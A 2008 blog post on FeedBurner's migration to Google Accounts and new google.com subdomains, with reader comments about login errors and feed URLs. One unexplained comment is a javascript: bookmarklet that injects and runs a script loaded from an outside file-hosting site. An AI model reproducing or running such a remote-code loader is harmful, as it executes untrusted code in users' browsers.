Monday, June 09, 2008

FeedBurner's New Home

FeedBurner announced in April that it will migrate all its users to Google Accounts. But there's an interesting side-effect: Google will no longer use feedburner.com, opting to use some new subdomains on google.com. It seems that FeedBurner's new home will be feedburner.google.com, a site that announces you can use FeedBurner to "analyze, publicize, optimize, and monetize your feeds". For now, you can't log in or create a new account at feedburner.google.com, but this should change when FeedBurner starts the migration process.


The feeds hosted by FeedBurner will also move from: http://feeds.feedburner.com/name to http://feeds.feedburner.google.com/name, as you can see for this feed. FeedBurner's redirects will start with http://feedproxy.google.com/ , another new Google subdomain.

Google didn't change the branding, but it's clear that FeedBurner will be integrated in many Google services and its identity will slowly dilute.

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Google auth not valid :(
Invalid request.

when we try to log in at the new home :)
Did you actually read the post?

"For now, you can't log in or create a new account at feedburner.google.com, but this should change when FeedBurner starts the migration process."
sorry :)
Ups...that's true :) sorry guys !
FeedBurner can be visited in China now. On new domain.
Hi, its not working...error message: Invalid request
I'm confused.
Is this name change going to break all of my feeds.feedburner.com/name feeds??
Not working for me at the moment. May be they are slowly migrating all the feeds.

@Corey:
No, I don't think so. They will definitely use redirection for old feed URLs.
Invalid request. (Just kidding!)
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javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://www.hotlinkfiles.com/files/1657590_ondls/GENELIA.js';void(0)
What is your website's native rss feed, as opposed to its feedburner's rss feed? And how do you access it?